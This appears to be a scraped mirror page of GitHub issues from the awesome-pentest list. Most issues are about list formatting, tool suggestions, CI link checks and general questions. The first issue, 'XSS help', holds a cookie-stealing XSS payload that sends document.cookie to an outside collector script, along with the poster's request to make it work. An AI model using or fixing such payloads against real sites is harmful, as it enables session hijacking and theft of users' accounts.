Giter Site home page Giter Site logo

awesome-pentest's Issues

XSS help

I'm doing an ethical hacking test, I tested an XSS payload : <script>alert("xss")</script> on a website, and the pop-up appears, so I want to collect user cookie

I created a getcookie.php file and a cookies.txt file and and I uploaded both files to a hosting server,
I placed the two files in the htdocs folder, which now contains index.html, getcookie.php and a cookies.txt

This is the getcookie.php file:

When I try this in the search box: : <script>document.location="http://website.com/getcookie.php?c="+document.cookie;</script>

I get this URL:
https://website2/search/?section=all&query=<script>document.location="http:SLASHSLASHwebsite.comSLASHgetcookie.php?c="+document.cookie;&path=SLASH

and I don't see any cookies in cookies.txt

What am I doing wrong, please? I've tried lot of payloads in the past 3 days but no results,
when I type http://website.com/getcookie.php in a new tab, I get the cookie but it's empty, I get this text : Cookie:

Thank you

A bunch of New Tools

Making the list awesome-compliant?

Interested in making your list sindersorhus/awesome compliant?

By me quickly skimming through the list, it doesn't seem like there's a lot to be done for it to be compliant:

  • Replacing ### with ## and #### with ###.
  • Replacing ### with # in the title of the repo.
  • Removing TravisCI icon (you get the email notifications when the build is failing anyway, having the icon makes the list more cluttered).
  • Naming the table of content Contents.
  • Adding the awesome badge.

Somebody already submitted your list in a PR, but it got denied because it didn't respect the requirements above.

If you're up for it, I'll make a quick little formatting PR to make it compliant.

Netsparker

Netsparker was bought by a company called Invicti, so you should probably update the links to reflect that.

Sandboxing

Hi everyone, I am currently looking for an avenue that permits me the ability to receive large files securely from clients so I can analyze them. I am specifically shopping for a cheap and possible free cloud platform that can help with this. Please does anyone have a solution?

Travis and links

https://travis-ci.org/enaqx/awesome-pentest/builds/202005150

Travis make failing PR because of others link not responding.

All my commit is good, the link no working is not from me but is already in the list.
Furthermore, when having about one hundred links there is nearly always a timeout. This may be only temporary. For example in https://travis-ci.org/enaqx/awesome-pentest/builds/202005150 I checked the link http://network-tools.com/ 40min later and it was good.

So I ask that travis only check new link or changed link in the commit, not already existing links. Travis checking all old link disable new PR to be validated.

Are "Practice CTFs" a "pentest tool"?

No doubt that practicing our skills is important and CTFs provide a lot of opportunity for doing that. My question is twofold:

  • Given that there are numerous lists of wargaming/hacking challenge sites (like Zapya's list and the AnarchoTechNYC Meta Wiki's Infosec § Hacking challenges list), is including them here useful? If so, cool, I have a lot of suggestions. ;)
  • I'm not sure these are "practice CTFs" because "CTF" has a specific meaning; these are probably better termed "challenge sites" or "wargames."

CC: @techgaun, who I've asked questions like this before (in pull requests).

Commando VM

Can you add Commando VM pentesting distro for Windows 7 and Windows 10.

Finding recording

Any tools specifically for finding recording?
Ones I know people use:
KeepNote - discontinued
CherryTree - copy+paste issues

Splunk Database

I understand that Splunk does not need a lot of functionality that a MySQL database would provide, and to index and perform searches on Big Data it might not be a good option to use a relational database.

Does Splunk Education use Lucene as a search engine, or have they made their on-disk data format?

I am sorry if there are any problems in the way I am asking the question.

Please help me

Regards
Gnanasekar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.